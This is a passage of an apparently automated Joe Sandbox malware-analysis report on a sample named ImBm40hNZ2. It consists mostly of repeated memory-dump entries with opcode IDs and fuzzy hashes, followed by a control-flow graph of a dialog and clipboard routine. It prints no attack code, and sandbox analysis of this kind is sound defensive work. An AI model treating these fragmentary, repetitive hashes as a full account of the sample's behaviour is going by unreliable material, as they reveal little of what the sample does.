                                                                                                                                                                                                                                                                • Instruction ID: a1d446687d0a9f3e7533816118799b60d1b62a292acbed76a3567ba12d0b8ec8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39E06DB2510644FBE765CB54CD41FA673ACEB05761F580258B125964D0EAB0FE40C660
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 9f16862f99d6e93e34b0d57e8f7eb87bba81083b4f5553be8a96e34c59d33f0a
                                                                                                                                                                                                                                                                • Instruction ID: 656afbe1f1dddf3c6ceb7d65952932bb98d4915a2aaed91d671b1c24b34721dd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f16862f99d6e93e34b0d57e8f7eb87bba81083b4f5553be8a96e34c59d33f0a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07E09232500744DBC321EB28CC01F9B77A9EF50365F104125F1665B9A2CA30AD10CBD4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                                                                                                                                                                                                • Instruction ID: 9bd0550054d0024ea70e425477a3888e5dea35e563ddf747d6734b2a80cb4d03
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAE0CD31440718EFF7315B60EC00F4176A5FF44751F140959F0C5154A1CBB5D8D1DB48
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                                                                                                                                                                                                                • Instruction ID: 661f3a4c52e5a65e21a7b0d675d14a5bcde4b149b1fa9412dc02fd0068bffa10
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50D05E32551B10EAC7321F28FD05FA37BB5AF45B21F050528B101268F186A6ED94CA90
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                                                                                                                                                                                                • Instruction ID: 312fa4471be8928de3bffa7ba06ab52145ef2e0ee3471949f9ba730976dddc75
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6E0EC79D50788DFCF12DB59C640F5EB7B9BF85B80F190454A5086B6B1D724E900CB40
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                                                                                                                                                                                                • Instruction ID: 7af6b210f3d03c2f8a6841ce6e9e8b2daa9b4e34fd146fac19a4c6f3006d5df5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FD022370D020CFBCB118F61CC01FA13BA8E794B60F004020B504874A0CA3AE860C580
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                                                                                                                                                                                                • Instruction ID: 923fbecec484a6b13d776f6bb6ec5a5124f6032e043956f6d8c8bb2cac537bc5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13D0C939312D80DFD206CB09C994B0633A8BB44B84FC50490E801CB722D22CD980CA00
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                                                                                                                                                                                                • Instruction ID: 03a80eda494f04bb95ecb6e3f9033fbcacd13c97dcc1e0a8864c047e7026f01a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2C01232290648AFC7229AA8CD41F127BA9EB98B00F000021F2048BA71D631E820EA88
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                                                                                                • Instruction ID: 5026db5982a66f40feda28a515826ed80fdb2b18d8fe7e5388b0ff0635e8badc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12D0123610064CEFCB05DF40C850D5A7B2AFFC8710F108019FD19077118A35ED62DA50
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                                                                                                                                                                                                                • Instruction ID: da0a101167022c309e280c04350a1db632ecbb4cff44fd7ff03bea30639a0d73
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51C080745417C8EEEF164710C950F25395C6B09B85FCC015C67105D491C759D5158204
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                                                                                                                                                                                                                                • Instruction ID: e7dd3a8ce4f96620009caa48b8e7d4bbacd881877719aeb7bc1cb7e57ea803af
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1EC00239B41640CFEE06CA29C284A4977E8B748780F150490E8059BA21D624E850CA10
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Memory Dump Source
• Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: f5f0db94fd0addb6877481fc54dd7ccb4156b19faefc228f1e6be2f8e8c26750
                                                                                                                                                                                                                                                                • Instruction ID: f8ddeeb33fe248637f009ea98bd9363fddcd81fea3ef8576ec84cf652cba7038
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5f0db94fd0addb6877481fc54dd7ccb4156b19faefc228f1e6be2f8e8c26750
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4690023130510C52E504A1584904686001587D0302F51C456B7114615ED67988D57231
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 310e5d915f8cb506a8080924b63fe2a4f336b1f7e2a7d78b4840b15db2b5c324
                                                                                                                                                                                                                                                                • Instruction ID: 9ad2ab63e7e471fc5c1b84f25690b5871cfe1689adb2b9b715d1607ed93eb1ed
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 310e5d915f8cb506a8080924b63fe2a4f336b1f7e2a7d78b4840b15db2b5c324
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B090023170910C52E550B1584514746001587D0302F51C456B1114614DC7698A9977A1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: bcc3b059c7dc93566c84ffe0484f7877d23f9074e63c2d1f20b3db00315f9de9
                                                                                                                                                                                                                                                                • Instruction ID: 5875fcb0ad312bac6d2456f72c0a19ac048145d1f841c02251c04eaa00d31316
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bcc3b059c7dc93566c84ffe0484f7877d23f9074e63c2d1f20b3db00315f9de9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE900225325108521545E558070450B045597D6352391C45AF2506550CC63588A96321
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 31b16f228fe4be65a141f8bc83f570ca1929d291f68e4362cb6eb36c89c05d36
                                                                                                                                                                                                                                                                • Instruction ID: 6e0fa2fdd4845ae0a46f98eb36d975fb307c0af544f4fe966fa158805c55b9da
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31b16f228fe4be65a141f8bc83f570ca1929d291f68e4362cb6eb36c89c05d36
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 779002A1305248E25900E2588504B0A451587E0202B51C45BF2144520CC5398895A235
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 2b740cd759759ba7c52d3741a89157cada22506ca74db2cb6d143edbbfb3c108
                                                                                                                                                                                                                                                                • Instruction ID: 25c80381d54a7c2e24195d1d5e195d49cddffa16be57322421f636d610069aef
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b740cd759759ba7c52d3741a89157cada22506ca74db2cb6d143edbbfb3c108
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4900225315108531505E5580704507005687D5352351C466F2105510CD63588A56221
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 679b415a01a2f86360467b30f5fd1374d84fb7af29e80b7d1b61e578abde3db8
                                                                                                                                                                                                                                                                • Instruction ID: 24f3cf0533ce987d96b6c3a32b1464cc2401fff48c6db43430e09d7f62a3a770
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 679b415a01a2f86360467b30f5fd1374d84fb7af29e80b7d1b61e578abde3db8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA90022134915952E550B15C45046164015A7E0202F51C466B1904554DC56988997321
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 3e71720ec928ee1befe485b293b310bc93c6f656a88405ce75752b3b3db00cfd
                                                                                                                                                                                                                                                                • Instruction ID: f50c9da233bc550b7884b56f7c3d257e6503639d5bcdad6bcdee7c93ce3a1fd7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e71720ec928ee1befe485b293b310bc93c6f656a88405ce75752b3b3db00cfd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B190022134510C52E540B15885147070016C7D0602F51C456B1114514DC62A89A977B1
Memory Dump Source
• Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5aa8bdfbd778112320b7fb494e2bcd00ce78119b6adcce0e80a47addab073b85
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F90026134510C92E500A1584514B060015C7E1302F51C45AF2154514DC62DCC967226
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                                                                • Instruction ID: cbf2ddde37432a230e1ec7466d7660ee9db19cd8af14b735b234d0989fa3ad20
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash:

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 238 404fba-404fd6 239 405167-40516d 238->239 240 404fdc-4050a5 GetDlgItem * 3 call 403eb4 call 40471a GetClientRect GetSystemMetrics SendMessageA * 2 238->240 242 405197-4051a3 239->242 243 40516f-405191 GetDlgItem CreateThread CloseHandle 239->243 262 4050c3-4050c6 240->262 263 4050a7-4050c1 SendMessageA * 2 240->263 245 4051c5-4051cb 242->245 246 4051a5-4051ab 242->246 243->242 247 405220-405223 245->247 248 4051cd-4051d3 245->248 250 4051e6-4051ed call 403ee6 246->250 251 4051ad-4051c0 ShowWindow * 2 call 403eb4 246->251 247->250 256 405225-40522b 247->256 252 4051d5-4051e1 call 403e58 248->252 253 4051f9-405209 ShowWindow 248->253 259 4051f2-4051f6 250->259 251->245 252->250 260 405219-40521b call 403e58 253->260 261 40520b-405214 call 404e7c 253->261 256->250 264 40522d-405240 SendMessageA 256->264 260->247 261->260 267 4050d6-4050ed call 403e7f 262->267 268 4050c8-4050d4 SendMessageA 262->268 263->262 269 405246-405272 CreatePopupMenu call 405bb3 AppendMenuA 264->269 270 40533d-40533f 264->270 277 405123-405144 GetDlgItem SendMessageA 267->277 278 4050ef-405103 ShowWindow 267->278 268->267 275 405274-405284 GetWindowRect 269->275 276 405287-40529d TrackPopupMenu 269->276 270->259 275->276 276->270 279 4052a3-4052bd 276->279 277->270 282 40514a-405162 SendMessageA * 2 277->282 280 405112 278->280 281 405105-405110 ShowWindow 278->281 283 4052c2-4052dd SendMessageA 279->283 284 405118-40511e call 403eb4 280->284 281->284 282->270 283->283 285 4052df-4052ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 283->285 284->277 287 405301-405321 SendMessageA 285->287 287->287 288 405323-405337 GlobalUnlock SetClipboardData CloseClipboard 287->288 288->270
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040501A
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405029
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405066
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 0040506E
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 0040508F
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050A0
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001001,00000000,?), ref: 004050B3
